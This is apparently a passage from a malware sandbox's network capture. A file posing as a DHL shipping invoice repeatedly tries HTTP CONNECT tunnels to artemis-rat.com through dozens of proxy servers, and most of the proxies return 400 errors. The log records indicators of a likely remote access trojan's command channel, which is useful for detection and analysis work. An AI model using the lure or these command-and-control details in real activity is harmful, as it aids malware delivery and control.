                            Mar 12, 2024 08:37:06.435910940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1705192.168.2.454818203.95.198.14680806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.437740088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1706192.168.2.455022172.67.181.37806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.441338062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.528539896 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1707192.168.2.45489614.54.107.90806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.447052956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.729986906 CET340INHTTP/1.1 400 Bad Request
                            Server: nginx/1.12.2
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 173
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1708192.168.2.454356185.32.6.12141536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.508896112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1709192.168.2.45489745.195.149.7910806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.510858059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1710192.168.2.455063172.67.182.150806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.511728048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.599855900 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1711192.168.2.455062104.16.213.202806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.511790991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.601675034 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1712192.168.2.455068172.67.181.12806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.512048960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.599761009 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1713192.168.2.454961160.16.90.3531286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.512836933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.816122055 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1714192.168.2.454836111.53.178.24973026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.513881922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.453237057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1715192.168.2.454874203.95.196.580806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.514013052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1716192.168.2.455104104.16.107.206806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.514383078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.602339029 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1717192.168.2.45509738.54.6.3990806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.514616013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.611700058 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1718192.168.2.454630198.8.94.174390786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.514914989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1719192.168.2.455122104.22.1.113806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.515010118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.602842093 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1720192.168.2.455120104.27.122.6806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.515052080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.603223085 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1721192.168.2.45019934.129.188.11731286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.516596079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.640595913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.736258984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.749329090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:30.843516111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:42.939563990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:54.952873945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:18.952886105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:07.031049967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1722192.168.2.45420339.165.0.13790026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.521977901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.975090981 CET311INHTTP/1.1 400 Bad Request
                            Server: nginx
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1723192.168.2.454301189.240.60.16490906484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.523978949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.873086929 CET72INHTTP/1.1 200 Connection established
                            Proxy-Agent: Fortinet-Proxy/1.0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1724192.168.2.455003154.12.178.107299856484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.532558918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1725192.168.2.455168162.120.71.11806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.539231062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.636795044 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1726192.168.2.454953222.223.103.23273026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.540467978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.883338928 CET90INHTTP/1.1 200 OK
                            Content-Type: application/json
                            Connection: close
                            Content-Length: 55


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1727192.168.2.45502737.120.239.191806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.541745901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.704552889 CET327INHTTP/1.1 400 Bad Request
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1728192.168.2.45516538.162.10.19531286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.555228949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.884712934 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
